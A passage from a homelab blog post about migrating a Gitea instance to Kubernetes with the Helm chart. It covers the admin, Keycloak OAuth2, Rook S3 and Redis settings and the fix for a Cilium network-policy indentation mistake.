</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__SECURITY__SECRET_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__OAUTH2__JWT_SECRET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jwt-secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">jwt</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__MAILER__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_BUCKET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the <code>gitea.admin</code> config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#66d9ef">null</span>
</span></span></code></pre></div><p>I&rsquo;ve already got an admin account, so I didn&rsquo;t want the Helm chart to create a
new one. I thought I could do that by just setting <code>admin: {}</code>, but of course
that doesn&rsquo;t work, so the Helm chart created an admin user with the chart&rsquo;s default
<code>gitea.admin.password</code>. I then figured out that setting all values to <code>null</code>
does work. It&rsquo;s important to note that Gitea doesn&rsquo;t remove the newly
created admin user again; it has to be deleted manually via the UI.</p>
<p>The <code>gitea.oauth</code> config is also worth a paragraph. First, it&rsquo;s important to note
that this is the config for Gitea as an OAuth2 <em>client</em>. The config for Gitea
as an identity provider has to be done in another place.
I&rsquo;m using <a href="https://www.keycloak.org/">Keycloak</a> as my identity provider in the
Homelab. For more details, see <a href="https://blog.mei-home.net/posts/sso/">this post</a>.
The issue is that Gitea&rsquo;s OAuth2 client config can only be done in the UI or
via the CLI, not via the config file. And I had already taken my Nomad instance
down at this point. I could get the client ID and secret from Keycloak, but not,
for example, the name under which it was saved in Gitea&rsquo;s database. It was also
pretty unclear which options should be set under the <code>gitea.oauth</code> key. I finally
ended up looking into the <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/templates/gitea/init.yaml">init container script</a>,
which is a bash script using the Gitea CLI to create the OAuth2 entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>    <span style="color:#66d9ef">function</span> configure_oauth<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- <span style="color:#66d9ef">if</span> .Values.gitea.oauth <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- range $idx, $value :<span style="color:#f92672">=</span> .Values.gitea.oauth <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      local OAUTH_NAME<span style="color:#f92672">={{</span> <span style="color:#f92672">(</span>printf <span style="color:#e6db74">&#34;%s&#34;</span> $value.name<span style="color:#f92672">)</span> | squote <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      local full_auth_list<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>gitea admin auth list --vertical-bars<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>      local actual_auth_table<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># We might have distorted output due to warning logs, so we have to detect the actual user table by its headline and trim output above that line</span>
</span></span><span style="display:flex;"><span>      local regex<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;(.*)(ID\s+\|Name\s+\|Type\s+\|Enabled.*)&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>full_auth_list<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span>~ $regex <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>        actual_auth_table<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>BASH_REMATCH[2]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tail -n+2<span style="color:#66d9ef">)</span> <span style="color:#75715e"># tail&#39;ing to drop the table headline</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      local AUTH_ID<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>actual_auth_table<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | grep -E <span style="color:#e6db74">&#34;\|</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">\s+\|&#34;</span> | grep -iE <span style="color:#e6db74">&#39;\|OAuth2\s+\|&#39;</span> | awk -F <span style="color:#e6db74">&#34; &#34;</span>  <span style="color:#e6db74">&#34;{print \$1}&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;No oauth configuration found with name &#39;</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;. Installing it now...&#34;</span>
</span></span><span style="display:flex;"><span>        gitea admin auth add-oauth <span style="color:#f92672">{{</span>- include <span style="color:#e6db74">&#34;gitea.oauth_settings&#34;</span> <span style="color:#f92672">(</span>list $idx $value<span style="color:#f92672">)</span> | indent <span style="color:#ae81ff">1</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;...installed.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;Existing oauth configuration with name &#39;</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;: &#39;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;. Running update to sync settings...&#34;</span>
</span></span><span style="display:flex;"><span>        gitea admin auth update-oauth --id <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">{{</span>- include <span style="color:#e6db74">&#34;gitea.oauth_settings&#34;</span> <span style="color:#f92672">(</span>list $idx $value<span style="color:#f92672">)</span> | indent <span style="color:#ae81ff">1</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;...sync settings done.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- end <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- <span style="color:#66d9ef">else</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;no oauth configuration... skipping.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- end <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    configure_oauth
</span></span></code></pre></div><p>I&rsquo;ve removed some unimportant bits for the sake of brevity (heh, brevity &#x1f602;).
What we can see here is that the entries in the <code>gitea.oauth</code> section are converted
1:1 into CLI flags and their parameters.
To find the right options for my Keycloak setup, I ended up looking
into the database:</p>
<pre tabindex="0"><code>\c gitea
SELECT * FROM login_source;

id | type |   name   | is_sync_enabled |                                                                                                                                                                                               cfg                                                                                                                                                                                               | created_unix | updated_unix | is_active
----+------+----------+-----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-----------
  1 |    6 | Keycloak | f               | {&#34;Provider&#34;:&#34;openidConnect&#34;,&#34;ClientID&#34;:&#34;bar&#34;,&#34;ClientSecret&#34;:&#34;foo&#34;,&#34;OpenIDConnectAutoDiscoveryURL&#34;:&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;,&#34;CustomURLMapping&#34;:null,&#34;IconURL&#34;:&#34;&#34;,&#34;Scopes&#34;:null,&#34;RequiredClaimName&#34;:&#34;&#34;,&#34;RequiredClaimValue&#34;:&#34;&#34;,&#34;GroupClaimName&#34;:&#34;&#34;,&#34;AdminGroup&#34;:&#34;&#34;,&#34;RestrictedGroup&#34;:&#34;&#34;,&#34;SkipLocalTwoFA&#34;:true} |   1678573526 |   1678573526 | t
(1 row)
</code></pre><p>But this still left the question of how the <code>gitea.oauth.existingSecret</code> should
be formatted. Which keys was the chart expecting the Secret to have?
I wasn&rsquo;t able to find any info, so I ended up looking first for the place where
the <code>gitea.oauth_settings</code> from the init script above was defined, which led
me to the chart&rsquo;s <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/templates/_helpers.tpl">helpers</a>
again:</p>
<pre tabindex="0"><code>{{- define &#34;gitea.oauth_settings&#34; -}}
{{- $idx := index . 0 }}
{{- $values := index . 1 }}

{{- if not (hasKey $values &#34;key&#34;) -}}
{{- $_ := set $values &#34;key&#34; (printf &#34;${GITEA_OAUTH_KEY_%d}&#34; $idx) -}}
{{- end -}}

{{- if not (hasKey $values &#34;secret&#34;) -}}
{{- $_ := set $values &#34;secret&#34; (printf &#34;${GITEA_OAUTH_SECRET_%d}&#34; $idx) -}}
{{- end -}}

{{- range $key, $val := $values -}}
{{- if ne $key &#34;existingSecret&#34; -}}
{{- printf &#34;--%s %s &#34; ($key | kebabcase) ($val | quote) -}}
{{- end -}}
{{- end -}}
{{- end -}}
</code></pre><p>Here, the <code>key</code> and <code>secret</code> values, if not defined in the chart, are set to
the <code>GITEA_OAUTH_KEY_$ID</code> and <code>GITEA_OAUTH_SECRET_$ID</code> env variables. Looking for those variables then led me
to the <a href="https://gitea.com/gitea/helm-chart/src/branch/main/templates/gitea/deployment.yaml">Deployment template</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA_OAUTH_KEY_{{ $idx }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>:  <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">$value.existingSecret }}</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA_OAUTH_SECRET_{{ $idx }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>:  <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">$value.existingSecret }}</span>
</span></span></code></pre></div><p>And here I finally had my answer: the Secret should have a key <code>key</code> and a key
<code>secret</code> for the two values.</p>
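<p>For illustration, such a Secret could look roughly like this. This is only a sketch: the Secret name matches the <code>existingSecret</code> I use below, but the data values are placeholders:</p>
<pre tabindex="0"><code># Sketch of the Secret referenced by gitea.oauth[].existingSecret.
# The data keys &#39;key&#39; and &#39;secret&#39; are what the Deployment template above expects.
apiVersion: v1
kind: Secret
metadata:
  name: oidc-credentials
type: Opaque
stringData:
  key: my-keycloak-client-id         # presumably the OAuth2 client ID (placeholder)
  secret: my-keycloak-client-secret  # presumably the OAuth2 client secret (placeholder)
</code></pre>
<p>Armed with that info I could finally define the OAuth2 options:</p>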
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;</span>
</span></span></code></pre></div><p>One thing that annoyed me is Gitea&rsquo;s S3 config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The <code>MINIO_ENDPOINT</code> needs to have the host and port in one value. But the
ConfigMap created by Rook for a new bucket contains them only in separate keys,
meaning I had to hardcode the value in the <code>values.yaml</code> instead of taking it
from the ConfigMap.</p>
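<p>For context, the bucket ConfigMap Rook generates looks roughly like this. A sketch only: the key names come from the ObjectBucketClaim mechanism, the values are placeholders:</p>
<pre tabindex="0"><code># Sketch of a Rook-generated bucket ConfigMap. Host and port live in
# separate keys, so they can&#39;t be fed into MINIO_ENDPOINT with a single
# configMapKeyRef.
apiVersion: v1
kind: ConfigMap
metadata:
  name: gitea-bucket
data:
  BUCKET_NAME: gitea-bucket-abc123   # placeholder
  BUCKET_HOST: rook-ceph-rgw-rgw-bulk.rook-cluster.svc
  BUCKET_PORT: &#34;80&#34;
</code></pre>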
<p>But at least I could still use the Secret Rook creates to get the S3 credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>An option like this is what more Helm charts should have: The ability to use
the <code>valueFrom</code> form of defining env variables. With this, I can easily use
autogenerated Secrets and ConfigMaps without having to jump through hoops.</p>
<p>The next stumbling block was the Redis config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span></code></pre></div><p>Here I wasn&rsquo;t aware that the connection string has to follow a specific format
and isn&rsquo;t just <code>host:port</code>. It took me a while to figure out why I couldn&rsquo;t
connect to Redis.</p>
<p>And finally, another word on YAML: Check your indentation! &#x1f605;
I had to make sure that the entire network could reach the SSH service so I
could actually use it for git operations. So I added <code>fromEntities:\n - world</code> to the
network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;gitea&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>And when I still could not connect, I checked with Cilium&rsquo;s monitoring:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-vh5jj -- cilium monitor --type drop
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span></code></pre></div><p>Fast forward through an hour of reading Cilium&rsquo;s network policy docs,
and I took another look at the policy - and realized that I had screwed up the
indentation. &#x1f926;
It should of course look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;gitea&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>With the <code>fromEntities</code> entry in the <code>ingress:</code> list, not the <code>fromEndpoints:</code>
list.
And after that it was all up and running. Woodpecker, my CI, did not need any
additional config to access Gitea; it worked out of the box. Likely because
it uses HTTPS for Git access and goes through the standard Gitea URL. And I
don&rsquo;t think I can change that to have it use the internal service instead of
going through the ingress. That&rsquo;s because it also uses Gitea for auth, and
I don&rsquo;t think it will handle having two different URLs to access Gitea very
